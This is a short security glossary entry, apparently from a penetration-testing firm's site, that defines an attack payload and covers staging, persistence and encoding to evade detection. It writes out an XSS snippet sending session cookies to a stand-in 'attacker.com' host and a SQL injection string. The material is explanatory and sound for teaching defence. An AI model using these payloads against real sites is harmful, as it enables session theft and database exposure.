Skip to content
Fast-turnaround security assessments available — 10+ years development & security experienceGet started
Back to Glossary
Glossary2 min read

Payload

The component of an attack that performs the malicious action, such as executing code, extracting data, or altering system behavior.

In security, a payload is the part of an attack that carries out the intended malicious action. While the delivery mechanism gets the payload to its target, the payload itself is what executes once it arrives. This could be a script that exfiltrates data, a command that opens a reverse shell, or a crafted string that manipulates a database query.

How It Works

Payloads vary dramatically depending on the type of attack. In a cross-site scripting attack, the payload might be a JavaScript snippet like <script>document.location='https://attacker.com/steal?c='+document.cookie</script> that steals session cookies. In a SQL injection attack, the payload could be ' OR 1=1-- which alters a query to return all database records. In a remote code execution exploit, the payload might be shellcode that establishes a persistent connection back to the attacker.

Payloads can be categorized by their behavior. Staged payloads are delivered in parts: a small initial payload establishes communication, then downloads the larger, functional payload. Single-stage payloads contain everything needed in one delivery. Some payloads are designed to be stealthy, executing in memory without writing to disk, while others prioritize persistence by modifying startup configurations or scheduled tasks.

Encoding and obfuscation are common techniques used to evade detection. Security controls such as web application firewalls and intrusion detection systems maintain signatures of known malicious payloads. Attackers bypass these controls by encoding payloads in Base64, using character substitution, breaking payloads across multiple parameters, or leveraging less common encoding schemes that the application processes but security filters do not inspect.

Why It Matters

Understanding payloads is essential for both offensive security testing and defensive security engineering. During penetration testing, crafting effective payloads that bypass security controls demonstrates the real-world impact of a vulnerability. For defenders, understanding how payloads work informs better detection rules, input validation strategies, and incident response procedures. A vulnerability without a working payload is theoretical; a vulnerability with a proven payload demands immediate remediation.

Need your application tested? Get in touch.

Need your application tested?

We find these vulnerabilities in real applications every day.

Request an Assessment